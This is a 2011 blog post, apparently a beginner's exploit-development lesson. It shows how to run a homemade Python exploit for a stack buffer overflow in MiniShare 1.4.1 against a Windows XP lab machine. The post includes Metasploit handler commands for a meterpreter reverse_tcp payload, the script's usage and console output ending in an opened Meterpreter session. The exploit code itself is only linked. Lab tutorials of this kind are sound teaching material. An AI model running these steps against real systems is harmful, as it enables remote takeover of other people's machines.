Archive for June, 2011

Lesson 0ne: Stack Based Buffer Overflow [minisploit.py]

#=========================================================#
I thought it was a good idea to start learning about exploit development and my first stop was on this wonderful blog by lupin (Thanks a LOT lupin).
to all the beginners like myself I would advice you to look at the tutorials they are exallent.
So after after going throgh the basics tutorial then I thought why not write the exploit from scratch again,make it take options from the command line and use meterpreter as a payload as well as host it some where for feature REFERENCE?
what is it:
++++++++
This is a simple stack based buffer over flow exploit. I wrote this one using the
guides from lupin’s blog as said earlier
It exploits a vulnerability in a Windows application MiniShare 1.4.1.
which is an older version of the MiniShare application
Requirements:

+++++++++++++
1.To test this script you will need a windows xp sp2 machine(can be a virtual machine)
2.The xp machine should be running minishare 1.4.1 available   here
3.An attack machine (should have python and metersploit  installed) bt should do
how to:
++++++
[1]First get the script from here
[2]The payload I used here is meterpreter/reverse_tcp so we need to start a listener on our
attacking machine to take care of this
how:
+++++
[a] run msfconsole from your terminal or from the msf installation directory

root@chim3ra:~# cd /pentest/exploits/framework3
root@chim3ra:/pentest/exploits/framework3# ./msfconsole

o                       8         o   o
8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 696 exploits - 358 auxiliary - 52 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r12936 updated 11 days ago (2011.06.13)


Warning: This copy of the Metasploit Framework was last updated 11 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf >

[b]Then we use multi handler to listen on our attacking machine,set payload to meterpreter and lhost to our attacking ip.


msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(handler) >

[c]And finally we exploit


msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...

[2]now make sure that minshare is running on your xp box if not just double click on the short cut in your desk top and drag a folder or file inside.
Ruunning the script:

++++++++++++++
[2]You may run the script with no options or with the -h (help) option to get the usage


root@chim3ra:~/exploit_home# ./minisploit.py
you need at least one arguments

###################################################################
#============+++++++++ minisploit.py ver0.1++++++++==============#
#----------------by ch!m3ra: http://www.chimera40.wordpress.com------------------#
#=============++++++++++++++++++++++++++++++++++++++==============#
###################################################################

Usage:./minisploit.py <options>
./minisploit.py -t <host> -p <port>
-t          The remote host to exploit
-p          The remote port (Default is 80)
-h          Simply print this help menu and exit for
Example:./minisploit.py -h 192.168.56.101 -p 80
(this will exploit minishare server at 192.168.56.101 )
or ./minisploit.py -h for help
please make sure you start multi handler(meterpreter)

[3]The run giving -t <host> (target option) where <host> is your xp machine ip
[4]NB:You may give the -p <port> (port option)  or leave it to default 80 where minishare runs on
by default.
[d]Everything set lets launch our exploit

root@chim3ra:~/exploit_home# ./minisploit.py -t 192.168.56.101 -p 80

###################################################################
#============++++++ minisploit.py ver 0.1 ++++++++++==============#
#--------by ch!m3ra: http://www.chimera40.wordpress.com-----------#
#=============++++++++++++++++++++++++++++++++++++++==============#
###################################################################

[+]Trying your payload on 192.168.56.101  Port 80 Please Wait......
[+]Connecting to  192.168.56.101 ........
[+]Connection successful!
[+]Delivering your payload be patient......
[+]Done!
[+]Your exploit data has been send to 192.168.56.101 Check you handler happy? :)
root@chim3ra:~/exploit_home#

[e]Done and when we check our handler
boooom!

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1035) at Fri Jun 24 11:57:11 +0300 2011

meterpreter >

Thats all there is to the post I know its a long post for no good reason but its a post anyway 😉
If you have you have read all through then here are some goodies and some fun here.

This links collection I stubled over it on the net you must like it
Thanks to Myne-us for the links and lupin for teaching me you guys rock 🙂